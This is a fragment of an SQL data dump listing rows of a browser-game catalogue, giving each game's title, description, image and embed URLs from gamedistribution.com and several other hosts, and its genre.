(38, 'Creator Master 2', 'Your one simple challenge is to fill your suitcase with the myriad objects provided.\n150 Levels waiting you to finish . Enjoy !', 'https://img.gamedistribution.com/4a12f7ca3d0a4b6999f9ee9beb46868c-512x512.jpeg', 'https://html5.gamedistribution.com/4a12f7ca3d0a4b6999f9ee9beb46868c/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/4a12f7ca3d0a4b6999f9ee9beb46868c-1280x720.jpeg', 0, ''),
(39, 'Classic Car Parking 3D', 'Classic Car Parking 3D is full of fun and enjoyment. This car parking games will develop your driving skills but not car racing skills. Brace yourself to fun with the newest, unique car parking game of 2018. This parking mania game will teach you various parking skills with old vintage car. Use WASD or Arrows to drive, Space - handbrake, use pressed left mouse button to rotate camera.', 'https://img.gamedistribution.com/c812b37e92cc419a87c00e3d33a90e33-512x384.jpeg', 'https://html5.gamedistribution.com/c812b37e92cc419a87c00e3d33a90e33/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(40, 'Listen Music Jigsaw', 'Listen Music Jigsaw is a free online game from genre of puzzle and jigsaw games. You can select one of the 12 images and then select one of the three modes: easy with 25 pieces, medium with 49 pieces and hard with 100 pieces. Have fun and enjoy!', 'https://img.gamedistribution.com/1cecbed59f3442b199c303e3f3926a3f-512x384.jpeg', 'https://html5.gamedistribution.com/1cecbed59f3442b199c303e3f3926a3f/', '0', 'Jigsaw', 0, 0, 'https://img.gamedistribution.com/1cecbed59f3442b199c303e3f3926a3f-1280x550.jpeg', 0, ''),
(41, 'Endless Jump', 'Endless Jump features:\n- parallax effect\n- fun gameplay', 'https://img.gamedistribution.com/825d01cfa9424d43a34088cc8753454a-1280x550.jpeg', 'https://html5.gamedistribution.com/825d01cfa9424d43a34088cc8753454a/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/825d01cfa9424d43a34088cc8753454a-512x384.jpeg', 0, ''),
(42, 'Toyota Prius Puzzle 2', 'Play with 6 images in this perfect jigsaw puzzle game: Toyota Prius Puzzle 2. All images is with the toyota prius. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/a5d13ac2094c4492999280cd3d05da69-512x384.jpeg', 'https://html5.gamedistribution.com/a5d13ac2094c4492999280cd3d05da69/', '0', 'Puzzle', 0, 0, '', 0, ''),
(43, 'Kinder Surprise', 'Kinde Surprise is fun online game suitable for all ages, especially for kids. This time you need to unwrap your kinder egg by clicking on it, than eat the chocolate and open the yellow container to get a toy. I hope that each time you will get a different toy. Now, go ahead, click and have fun.', 'https://img.gamedistribution.com/cc2d72490bb84ba3a96370e0838c4909-512x384.jpeg', 'https://html5.gamedistribution.com/cc2d72490bb84ba3a96370e0838c4909/', '0', 'Casual', 0, 0, '', 0, ''),
(44, 'Crazy Match3', 'Crazy Match3 is fun addictive puzzle game.Connect 3 or more jewels to score more.Make as much long jewels chain as much you can to score higher.', 'https://img.gamedistribution.com/b6b7713782ad4453bb0e07c8805e9bb1-512x384.jpeg', 'https://html5.gamedistribution.com/b6b7713782ad4453bb0e07c8805e9bb1/', '0', 'Puzzle', 0, 0, '', 0, ''),
(45, 'Public Tricycle Tuk Tuk Rush', 'You are going be an auto rickshaw driver in this amazing parking simulator game. Tuk Tuk cannot park itself, it needs a driver just like you.', 'https://img.gamedistribution.com/0a1a37a764ca4e83b6ed9f7748a76ddc-512x512.jpeg', 'https://html5.gamedistribution.com/0a1a37a764ca4e83b6ed9f7748a76ddc/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/0a1a37a764ca4e83b6ed9f7748a76ddc-1280x550.jpeg', 0, ''),
(46, 'Spot The Patterns', 'A good cognitive training game. Predict the next object based on the previous pattern.\n\nFeatures:\n\n- Hint system\n- 3 different levels. Easy, Medium and Hard\n- Fun and vibrant theme which encourages learning\n\nThis game is perfect for schools, preschool, families and even seniors.', 'https://img.gamedistribution.com/3ef8f2cc7f4a4a36a0c293533308f0f8-1280x550.jpeg', 'https://html5.gamedistribution.com/3ef8f2cc7f4a4a36a0c293533308f0f8/', '0', 'Educational', 0, 0, 'https://img.gamedistribution.com/3ef8f2cc7f4a4a36a0c293533308f0f8-512x384.jpeg', 0, ''),
(47, 'Awesome Breakout', 'This is a challenging game, based on the popular BREAKOUT game. You need to control the bouncing ball using a paddle. The paddle can be moved by mouse or touch. There are 24 levels in this game. Destroy all the BLOCKS in a level, to complete it.', 'https://img.gamedistribution.com/c9937e209f8247db9d7e16b147b1842f-512x384.jpeg', 'https://html5.gamedistribution.com/c9937e209f8247db9d7e16b147b1842f/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/c9937e209f8247db9d7e16b147b1842f-1280x550.jpeg', 0, 'md'),
(48, 'How Smart Are You', 'How smart are you? Answer random trivia questions ranging from broad topics such as popular culture, internet technology, geography, music, history and more.\n\nFeatures:\n\n- Simple and responsive design, suitable for customizations.\n- Are you smarter than a 5th grader?\n- Simple and clean design. Great for reskins.\n- Full screen mode', 'https://img.gamedistribution.com/c0cc98650b7d4086aabee05e690eaebc-1280x550.jpeg', 'https://html5.gamedistribution.com/c0cc98650b7d4086aabee05e690eaebc/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/c0cc98650b7d4086aabee05e690eaebc-512x384.jpeg', 0, ''),
(49, 'Classical Deer Sniper Hunting 2019', 'Deer growth is out of control and you need to control population by hunting them with your sniper rifle. Aim your rifle at target and take precision shots for clean kills. Do not kill other animals. Good Luck', 'https://img.gamedistribution.com/3113c3b32416482883722b201ab52b11-512x384.jpeg', 'https://html5.gamedistribution.com/3113c3b32416482883722b201ab52b11/', '0', 'Battle', 0, 0, '', 0, ''),
(50, 'Mini Summer Vacation', 'These three friends are eager to get a perfect tan on the beach, but they get bored so easily! Join them in an awesome and fun adventure where you get to prepare the Mini friends for the beach and then spend time with them doing fun activities. Make sure they drink enough liquids, use sunscreen and eat lots of fruits. Don\'t let them get bored or else they will leave! Have fun splashing water and taking selfies, this beach day will be super fun for everybody!', 'https://img.gamedistribution.com/7ac119c492044647b6886baa766e3ead-512x384.jpeg', 'https://html5.gamedistribution.com/7ac119c492044647b6886baa766e3ead/', '0', 'Dress-up', 0, 0, '', 0, ''),
(51, 'Potato Chips Maker', 'Potato Chips Maker features:\n- good graphics\n- easy gameplay', 'https://img.gamedistribution.com/0b833bdc1c0b48e2ad3d8a0e3311cda2-1280x550.jpeg', 'https://html5.gamedistribution.com/0b833bdc1c0b48e2ad3d8a0e3311cda2/', '0', 'Cooking', 0, 0, 'https://img.gamedistribution.com/0b833bdc1c0b48e2ad3d8a0e3311cda2-512x384.jpeg', 0, ''),
(52, 'Toyota Prius Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Toyota Prius Puzzle. All images is with the toyota prius. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/13ff88834c6c4678ae9da04f6a10d715-512x384.jpeg', 'https://html5.gamedistribution.com/13ff88834c6c4678ae9da04f6a10d715/', '0', 'Puzzle', 0, 0, '', 0, ''),
(53, 'Mission Escape Rooms', 'Escape mystery games, an extensive number of riddles and jab your mind, testing baffles, and through an assortment of activities, click, slide, g-sensor, etc. For the escape mystery.', 'https://img.gamedistribution.com/ee8a2bfd60a545e5b12f96dbdc0da6bd-512x384.jpeg', 'https://html5.gamedistribution.com/ee8a2bfd60a545e5b12f96dbdc0da6bd/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/ee8a2bfd60a545e5b12f96dbdc0da6bd-1280x720.jpeg', 0, ''),
(54, 'Highway Traffic Bike Stunts', 'Highway Traffic Bike Stunts features:\n- fun gameplay\n- good graphics', 'https://img.gamedistribution.com/1333b0d0da5f45ab8c1306533bc6f29a-1280x550.jpeg', 'https://html5.gamedistribution.com/1333b0d0da5f45ab8c1306533bc6f29a/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/1333b0d0da5f45ab8c1306533bc6f29a-512x384.jpeg', 0, ''),
(55, 'Impossible Truck Driving', 'Impossible Truck Driving features:\n- multiple trucks\n- multiple levels', 'https://img.gamedistribution.com/23c7fe544cbc4910a70870bd5251f757-1280x550.jpeg', 'https://html5.gamedistribution.com/23c7fe544cbc4910a70870bd5251f757/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/23c7fe544cbc4910a70870bd5251f757-512x384.jpeg', 0, ''),
(56, 'Shark Hunter2', 'Shark Hunter2 is fun addictive shooting game.You have to survive from the hungry sharks, you can kill as many sharks as possible.But there is time limit also so be fast .\nHow to play: \nWASD or arrow keys-> Move\nMouse wheel(scroll)->weapon change\nctrl ->crouch\nspace->Jump\nMouse Left click->shoot\nMouse Right Click->zoom', 'https://img.gamedistribution.com/61db333d69594e5f9f38dabd518355d0-512x512.jpeg', 'https://html5.gamedistribution.com/61db333d69594e5f9f38dabd518355d0/', '0', 'Shooter', 0, 0, '', 0, ''),
(57, 'Brain Twister', 'Brain Twister is fun addictive puzzle game.The aim of the game, is to find the exact positions of the colors in the sequence.Every ball can be used only once in a sequence.', 'https://img.gamedistribution.com/de292dd7f3a04366a93b45260803b34c-512x384.jpeg', 'https://html5.gamedistribution.com/de292dd7f3a04366a93b45260803b34c/', '0', 'Casual', 0, 0, '', 0, ''),
(58, 'Smart EQ Forfour Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Smart EQ Forfour Puzzle. All images is with the smart eq forfour. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/f92c42a102a14d27b5052f74e896251c-512x384.jpeg', 'https://html5.gamedistribution.com/f92c42a102a14d27b5052f74e896251c/', '0', 'Puzzle', 0, 0, '', 0, ''),
(59, '3D Soccer Champions', 'This is a 3D football game, you can control the above characters to dribble and shoot the ball, so as to win the game', 'https://img.gamedistribution.com/a14422bfdbf246648318620d01defd08-512x384.jpeg', 'https://html5.gamedistribution.com/a14422bfdbf246648318620d01defd08/', '0', 'Football', 0, 0, '', 0, ''),
(60, 'Frenzy Chicken Farming', 'Have you ever wondered what it would be like to run your own farm? Looking after chickens, cows and picking their products such as eggs, milk, etc… Did you ever wanted to manage your own factories and mix different items to make new ones? Well, Frenzy farming is the answer to all your needs.', 'https://img.gamedistribution.com/b1a361c12a0c4076a251774dbdd4504e-512x384.jpeg', 'https://html5.gamedistribution.com/b1a361c12a0c4076a251774dbdd4504e/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/b1a361c12a0c4076a251774dbdd4504e-1280x720.jpeg', 0, ''),
(61, 'Scary Granny Basement Escape', 'Scary Granny: Basement Escape is a brand new game where you will face with Scary Evil Granny that want to find and kill you. You have to find all exit doors and escape from Basement. But beware from Scary Evil Granny. Use WASD or Arrows to move,  Space to jump, SHift to run and E to interact.', 'https://img.gamedistribution.com/ca981c4e111641478d2c8a64c0094366-512x384.jpeg', 'https://html5.gamedistribution.com/ca981c4e111641478d2c8a64c0094366/', '0', 'Adventure', 0, 0, '', 0, ''),
(62, 'Hop Hop', 'Hop Hop is fun addictive arcade game.In this game you have to pass the ball through the circles and collect as many mushrooms as you can .', 'https://img.gamedistribution.com/f7aed304937449b8b2c23942b8df52a8-512x512.jpeg', 'https://html5.gamedistribution.com/f7aed304937449b8b2c23942b8df52a8/', '0', 'Basketball', 0, 0, '', 0, ''),
(63, 'Offroad Snow Jeep Passenger Mountain Uphill Driving', 'Transport passengers in a fun and exciting manner\nMountain Jeep Passenger Transport Driver 19\nAn ultimate offroad adventure awaits you! Mountain Jeep Passenger Transport Driver 19 is an exceptional game that guarantees limitless fun and excitement. It is an action and adventure packed game with unlimited thrills and delights.', 'https://img.gamedistribution.com/e8080f4f2158403a8b457488830c4b74-512x384.jpeg', 'https://html5.gamedistribution.com/e8080f4f2158403a8b457488830c4b74/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(64, 'Gem Match Deluxe', 'A great Match 3 game with challenging levels and power-ups to help you complete each level. Use a mouse or touchpad to swap gems in order to make a match of 3 or more.', 'https://img.gamedistribution.com/963eff32fe1d465180ec14030fe7f1f1-512x384.jpeg', 'https://html5.gamedistribution.com/963eff32fe1d465180ec14030fe7f1f1/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/963eff32fe1d465180ec14030fe7f1f1-1280x550.jpeg', 0, ''),
(65, 'Let Me Out', 'Let Me Out is fun addictive puzzle game .Cars and trucks are blocking your cars path move those cars and trucks to unblock your path.', 'https://img.gamedistribution.com/b783cd2420f14b44bcfb6773f54e1060-512x512.jpeg', 'https://html5.gamedistribution.com/b783cd2420f14b44bcfb6773f54e1060/', '0', 'Casual', 0, 0, '', 0, ''),
(66, 'Perfect Wedding Cake', 'The wedding cake is a need for some, wedding events. What should the wedding cake resemble in your brain? Would you be able to plan a brilliant wedding cake? Plan the wedding cake with the different cakes improvements in the game. Appreciate Awesome Wedding Cake.', 'https://img.gamedistribution.com/6c5aecac97ec4ac09b2e62321ef86172-512x384.jpeg', 'https://html5.gamedistribution.com/6c5aecac97ec4ac09b2e62321ef86172/', '0', 'Dress-up', 0, 0, 'https://img.gamedistribution.com/6c5aecac97ec4ac09b2e62321ef86172-1280x550.jpeg', 0, ''),
(67, 'My Princess Room Decoration', 'There is a Princess who lives in a beautiful far off land, She is quaint and beautiful in every way just like the surroundings around her. She is used to the utmost lavish accommodation, elegant decor, luxurious furniture and chiseled gilded luxuries! Her father the King has hired you to be the Princess\'s new room designer. Can you live up to the lifestyle the Princess has come accustomed to? Give her a stunning room full of class and ambience!', 'https://img.gamedistribution.com/ca1690e82c674e23a7b4a37d826384fd-512x512.jpeg', 'https://html5.gamedistribution.com/ca1690e82c674e23a7b4a37d826384fd/', '0', 'Art', 0, 0, '', 0, ''),
(68, 'Horse Jumping Show 3D', 'Nothing is batter then riding a horse. Horse Horse Jumping Show 3D is a horse running games which require you to ride horse on the given track and cross obstacles by jumping. This game is designed to introduce you the beauty of horse riding and to fulfill your riding passion. So just play our new riding game and get yourself ready for amazing and challenging game horse ride Horse Jumping Show 3D. \nInstructions: WASD - Control, F - saddle a horse, 1-3 - Change Of Speed, Space - Jump', 'https://img.gamedistribution.com/eeabdce804604757900a1049dec647bd-512x384.jpeg', 'https://html5.gamedistribution.com/eeabdce804604757900a1049dec647bd/', '0', 'Simulation', 0, 0, '', 0, ''),
(69, 'Defend Village', 'The monster has attacked the village, hurry up to build a tower near the village road to destroy the monster', 'https://img.gamedistribution.com/4145489991024e6db12fcc24f4d603e0-512x384.jpeg', 'https://html5.gamedistribution.com/4145489991024e6db12fcc24f4d603e0/', '0', 'Battle', 0, 0, '', 0, ''),
(70, 'Battle of Tanks', 'Battle of Tanks is real time strategy tank deployment game. Objective is to destroy the opponent base by deploying the tanks. Deploy at least 3 tanks to advance towards enemy base. Selecting the right tanks at appropriate time is best way to win the battle. Good Luck', 'https://img.gamedistribution.com/5c519ae1e3904dc78daad40f988edf02-1280x720.jpeg', 'https://html5.gamedistribution.com/5c519ae1e3904dc78daad40f988edf02/', '0', 'Battle', 0, 0, '', 0, ''),
(71, 'Snakes and Ladders', 'Your life is represented by ladders (opportunities) and snakes (challenges).\n\nRoll the dice to navigate your pieces across the board in this fun multiplayer game. Arrive at a ladder, and advance faster. Arrive at a snake, and be transferred back a few steps.\n\nWho will win in this game of chance?\n\nFeatures:\n\n- Play with 2 or 4 people in a room.\n- Chat and make friends in this multiplayer casual game.\n- Plenty of avatars to choose from.\n- No friends? Play with the computer', 'https://img.gamedistribution.com/8099e7897ff5454c9017a6a73adcda39-1280x550.jpeg', 'https://html5.gamedistribution.com/8099e7897ff5454c9017a6a73adcda39/', '0', '.IO', 0, 0, 'https://img.gamedistribution.com/8099e7897ff5454c9017a6a73adcda39-512x384.jpeg', 0, ''),
(72, 'Xtreme Stunts Racing Cars 2019', 'Overcome the car racing hurdles coming your way in Xtreme Stunts Racing Cars 2019 real racing opponents extreme car driving simulator. Drift car racing is not an easy job on these highway tracks for victory against ultimate car racers 2019 with high speed racing drift car games on Google Play race for glory to simulate your world in comics games for all. Multiple city traffic racing highway tracks will make your top speed extreme car driving experience .', 'https://img.gamedistribution.com/e34efa7fa1d74095987fb29095fc1e78-512x340.jpeg', 'https://html5.gamedistribution.com/e34efa7fa1d74095987fb29095fc1e78/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/e34efa7fa1d74095987fb29095fc1e78-1280x720.jpeg', 0, ''),
(73, 'Car vs Cop 2', 'endless high speed chase game. Maneuver around by either using the joystick or tap controls. Enable combo scoring by letting cops come close to you.', 'https://img.gamedistribution.com/99b5415844f8488e8c8d501ddb71526e-512x512.jpeg', 'https://html5.gamedistribution.com/99b5415844f8488e8c8d501ddb71526e/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(74, 'FatBoy Dream', 'FatBoy Dream is fun addictive adventure arcade game.A boy is dreaming about the different types donuts and also jump between the the donuts but be make sure he will not fall from the donuts and can collect other candies as well.', 'https://img.gamedistribution.com/0b929fea607b46369962e5c880883f3f-512x512.jpeg', 'https://html5.gamedistribution.com/0b929fea607b46369962e5c880883f3f/', '0', 'Casual', 0, 0, '', 0, ''),
(75, 'Save The Whale', 'In this game your job is to control the whale and to save them for the hunters. You need to avoid all harpoons and bullets. Also avoid bombs and catch the sharks to get more power.Follow yellow arrow to catch the shark and green arrow to catch the shield.', 'https://img.gamedistribution.com/ca1f0006fabd480c9779c41dddbb5769-512x384.jpeg', 'https://html5.gamedistribution.com/ca1f0006fabd480c9779c41dddbb5769/', '0', 'Puzzle', 0, 0, '', 0, ''),
(76, 'Air Ship Warfare', 'Arcade Shoot ‘Em Up Game has arrived and it brings you one of the most compelling and satisfying experiences in the world! Enjoy the unique atmosphere of WW2 and discover the next-gen air combat shooter with outstanding retro graphic style!', 'https://img.gamedistribution.com/dfda096b18e744179f1d090da4eea011-512x512.jpeg', 'https://html5.gamedistribution.com/dfda096b18e744179f1d090da4eea011/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/dfda096b18e744179f1d090da4eea011-1280x550.jpeg', 0, ''),
(77, 'Fun Monsters Jigsaw', 'Fun Monsters Jigsaw is a free online game from genre of puzzle and jigsaw games. You can select one of the 12 images and then select one of the three modes: easy with 25 pieces, medium with 49 pieces and hard with 100 pieces. Have fun and enjoy!', 'https://img.gamedistribution.com/b4bbccc958ee4890a893142d14fbfb38-512x384.jpeg', 'https://html5.gamedistribution.com/b4bbccc958ee4890a893142d14fbfb38/', '0', 'Jigsaw', 0, 0, 'https://img.gamedistribution.com/b4bbccc958ee4890a893142d14fbfb38-1280x550.jpeg', 0, ''),
(78, 'Cute Diva Makeover', 'Meet Annie! She is only ten years old but is already showing signs of becoming quite the diva! She likes pretty clothes, perfect make up and cute fun accessories and if she doesn\'t get them she can throw quite the tantrum! It\'s a good job we like the same things that Annie does, isn\'t that right girls or she would be having a bad day! For without our brilliant makeover skills she would have no one to make her over. Let\'s give Annie the makeover and attention she has become used to.', 'https://img.gamedistribution.com/351082e53308480bb28aaff711987b27-512x512.jpeg', 'https://html5.gamedistribution.com/351082e53308480bb28aaff711987b27/', '0', 'Dress-up', 0, 0, '', 0, ''),
(79, 'Wings Rush', 'Fly through clouds and try to avoid the obstacles in your way, Roll, jump, flap and fly as far as you can Collect rings to unlock new characters. Control a running hedgehog or one of his friends. Guide the hero through many interesting tracks and beat the best scores', 'https://img.gamedistribution.com/77602ece2cfe47c08858a9bc5153501d-512x384.jpeg', 'https://html5.gamedistribution.com/77602ece2cfe47c08858a9bc5153501d/', '0', 'Adventure', 0, 0, '', 0, ''),
(80, 'Bottle Shooting', 'Bottle Shooting features:\n- multiple levels\n- 3 weapon models', 'https://img.gamedistribution.com/9cdf32ae78764ed88f773c33c240d2a0-1280x550.jpeg', 'https://html5.gamedistribution.com/9cdf32ae78764ed88f773c33c240d2a0/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/9cdf32ae78764ed88f773c33c240d2a0-512x384.jpeg', 0, ''),
(81, 'Falling Cube', 'Falling Cube is fun addictive puzzle game.Move the cubes left and right and change the directions with arrow keys.Complete lines to gain points and raise the level. The more lines completed at once, the more points gained. Completing the maximum number of lines at once.', 'https://img.gamedistribution.com/e5810fdfe87b4d87a86c8a80c0acb1b0-512x512.jpeg', 'https://html5.gamedistribution.com/e5810fdfe87b4d87a86c8a80c0acb1b0/', '0', 'Casual', 0, 0, '', 0, ''),
(82, 'Tiger Jigsaw', 'Tiger Jigsaw is a fun online puzzle game. Drag the pieces into right position using mouse. Solving puzzles is relaxing, rewarding, and keeps your brain sharp. You need to spend $1000 to be able to purchase one of the following pictures. You have three modes for each picture from which the hardest mode brings more money. You have a total of 10 pictures.', 'https://img.gamedistribution.com/94f6f98e9f554ff6a375ffa3f60cc6ff-512x384.jpeg', 'https://html5.gamedistribution.com/94f6f98e9f554ff6a375ffa3f60cc6ff/', '0', 'Jigsaw', 0, 0, 'https://img.gamedistribution.com/94f6f98e9f554ff6a375ffa3f60cc6ff-1280x550.jpeg', 0, ''),
(83, 'Stay on Road', 'Drift around the corners as you attempt to complete as many laps as possible without crashing. Your goal is simple: keep your car on the road!', 'https://img.gamedistribution.com/695ef1af14cf4d9396e41f12bfbc5369-512x384.jpeg', 'https://html5.gamedistribution.com/695ef1af14cf4d9396e41f12bfbc5369/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/695ef1af14cf4d9396e41f12bfbc5369-1280x550.jpeg', 0, ''),
(84, 'Chess Comp Stomp', '<h2><strong>Chess Comp Stomp</strong></h2><p><strong>it is good game strategie strange.</strong></p>', 'https://yassi.xyz/book/g12.png', 'https://html-classic.itch.zone/html/7966607/index.html', 'Yes', 'Puzzle', 0, 0, '', 0, 'md'),
(85, 'Bubble Shooter 123', '<h2><strong>Bubble Shooter 123</strong></h2><p>&nbsp;</p><p><strong>Bubble Shooter originated from the puzzle game Bobble 2, created by Taito Corporation in 1995. Puzzle Bobble 2 was and still is a popular arcade game and in 2001, the game\'s popularity reached new heights when it became available as a PC game called Bubble Shooter as we know it today.</strong></p>', 'https://yassi.xyz/book/g11.png', 'https://games.gameboss.com/gameboss-site/bubbleshooterclassic/index.html', 'Yes', 'Bubble Shooter', 0, 0, '', 0, 'md'),
(86, 'Dead Zombie Hunting', '', 'https://img.gamedistribution.com/1998758071bb497ba0ab98a6ebf05ac3-512x384.jpeg', 'https://html5.gamedistribution.com/1998758071bb497ba0ab98a6ebf05ac3/', '0', 'Shooter', 0, 0, '', 0, 'md'),
(87, 'Anti Stress Game 2', 'Anti Stress Game 2 is an online HTML5 game suitable for all ages. Anti Stress Game is a typical arcade game which is good for relaxation as matter of fact. You are allowed to play with letters, coloring, arrows, the window, the bubbles and the cool stones including the buddy. Here is no space and time limitation in this game. Good luck and have fun relaxing here!', 'https://img.gamedistribution.com/ba0984e03b77426b9be57de9d2c0dcc8-512x384.jpeg', 'https://html5.gamedistribution.com/ba0984e03b77426b9be57de9d2c0dcc8/', '0', 'Casual', 0, 0, '', 0, 'md'),
(88, 'Audi RS6 Avant Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Audi RS6 Avant Puzzle. All images is with the audi rs6 avant. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/b6a52cb6d0b44544b48614f76e3872e3-512x384.jpeg', 'https://html5.gamedistribution.com/b6a52cb6d0b44544b48614f76e3872e3/', '0', 'Puzzle', 0, 0, '', 0, 'md'),
(89, 'Surviving in the Woods', 'Surviving in the Woods is a brand new survival game where your mission is to survive in the wild forest. The only tool you have is an axe. There are many trees around you, use them to build a shelter in the forest. You can play in two location: day forest and night forest. WASD or arrow keys: move, Space bar: jump, Shift: run, E: pick up, R: drop an item, Left mouse button: build/cut trees, Esc/P:  pause.', 'https://img.gamedistribution.com/e257be3389364d8285db5c8c304ce07e-512x384.jpeg', 'https://html5.gamedistribution.com/e257be3389364d8285db5c8c304ce07e/', '0', 'Adventure', 0, 0, '', 0, 'md'),
(90, 'Fish Bubble Shooter', 'Fish Bubble Shooter is fun addictive bubble shooter game.match 3 or more same color bubbles to destroy them.And help the little fish.', 'https://img.gamedistribution.com/b71aa7606c364db0a81a019a5204f92c-512x512.jpeg', 'https://html5.gamedistribution.com/b71aa7606c364db0a81a019a5204f92c/', '0', 'Bubble Shooter', 0, 0, '', 0, ''),
(91, 'City Car Parking', '<p>City Car Parking features: - multiple cars - multiple levels</p>', 'https://img.gamedistribution.com/fdae69c326c746af98fa5d267222a945-1280x550.jpeg', 'https://html5.gamedistribution.com/fdae69c326c746af98fa5d267222a945/', 'Yes', 'Adventure', 0, 0, 'https://img.gamedistribution.com/fdae69c326c746af98fa5d267222a945-512x384.jpeg', 0, ''),
(92, 'Ambulance Rescue Driver Simulator 2018', 'Want to rescue the innocent and injured in an all new ambulance rescue driving game? Save those who get into a traffic accident by transporting patients to a hospital. Sound the ambulance sirens and be the best ambulance driver in this rescue game.Nothing is as stimulating as saving a human life. Drive fast! The patients need help and have to see a doctor, they need urgent medical care in this ambulance driving simulator 3D game 2018.', 'https://img.gamedistribution.com/a36acaa2ecba4e36b8243c2468abd313-512x384.jpeg', 'https://html5.gamedistribution.com/a36acaa2ecba4e36b8243c2468abd313/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(93, 'Wheelie Bike', 'Wheelie bike is fun addictive casual game.Balance the bike on one wheel as far as you can.', 'https://img.gamedistribution.com/790275cfc5c94f1da11d0aaa28599415-512x384.jpeg', 'https://html5.gamedistribution.com/790275cfc5c94f1da11d0aaa28599415/', '0', 'Casual', 0, 0, '', 0, ''),
(94, 'House Wall Paint', 'House Wall Paint is fun addictive arcade puzzle game. This is an endless game Paint the white space on the walls.It can be tricky at time so should have to be make sure that you paint in the right direction.Use arrow keys to paint walls.', 'https://img.gamedistribution.com/8b360a0bfd68442e9b6d6544e5c04e0c-512x512.jpeg', 'https://html5.gamedistribution.com/8b360a0bfd68442e9b6d6544e5c04e0c/', '0', 'Casual', 0, 0, '', 0, ''),
(95, 'Monster Truck Hidden Keys', 'Monster Truck Hidden Keys is a free online skill and hidden object game. Find out the hidden keys in the specified images. Each level has 10 hidden keys. There are 6 levels in total. The time is limited so be fast and find all hidden objects before time runs out. Clicking in the wrong place several times reduces the time by an additional 5 seconds. So, if you are ready start the game and have fun!', 'https://img.gamedistribution.com/caf5850158e741f3ba4e98b79cab698d-512x384.jpeg', 'https://html5.gamedistribution.com/caf5850158e741f3ba4e98b79cab698d/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/caf5850158e741f3ba4e98b79cab698d-1280x720.jpeg', 0, ''),
(96, 'Subway Surfers ', '<p><strong>Subway Surfers en ligne</strong> une jeux Acrade Il est disponible sur les plateformes Android, iOS, Kindle et Windows Phone et utilise le moteur de jeu Unity. Désormais, une version pour les navigateurs est également disponible,subway surfers afin que vous puissiez profiter du jeu sans avoir à le télécharger. En 2017, Subway Surfers était le jeu le plus demandé dans le monde. En mars 2018, Subway Surfers est devenu le premier jeu du Google Play Store à dépasser le milliard de téléchargements.<br>&nbsp;</p>', 'https://yassi.xyz/book/g10.png', 'https://files.ufreegame.net/1024/Subway-Surfers-Zurich/', 'Yes', 'Arcade', 0, 0, '', 0, 'md'),
(97, 'Shove It! ...The Warehouse Game', '<p><strong>Shove It! ...The Warehouse Game</strong></p>', 'https://yassi.xyz/book/g9.png', 'https://megadrive-emulator.com/game/?game=Shove_It_-_The_Warehouse_Gameu.bin', 'Yes', 'Puzzles', 0, 0, 'https://img.gamedistribution.com/263ab3c8635247fa82c372ff157ee36b-1280x550.jpeg', 0, ''),
(98, 'Turbo OutRun', '<p><strong>Turbo OutRun</strong></p>', 'https://yassi.xyz/book/g8.png', 'https://megadrive-emulator.com/game/?game=Turbo_Outrun_JUE.bin', 'Yes', 'Racing', 0, 0, '', 0, 'md'),
(99, 'Super Mario World', '<p><strong>Super Mario World</strong></p><p>&nbsp;</p><p>Super Mario World, It is actually like of Squirrel King. Whereas the first few stages have been altered (with tiles taken from Super Mario All-Stars on the SNES), later stages are identical to those seen in Squirrel King.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g7.png', 'https://megadrive-emulator.com/game/?game=Super_Mario_World_Unl.bin', 'Yes', 'Adventure', 0, 0, '', 0, 'md'),
(100, '3D KUNG FU FIGHT BEAT EM UP', 'Use your iron fist and combination to teach street thugs a lesson', 'https://img.gamedistribution.com/f646df654cc844ae80c17e31c57de389-512x512.jpeg', 'https://html5.gamedistribution.com/f646df654cc844ae80c17e31c57de389/', '0', 'Battle', 0, 0, '', 0, 'md'),
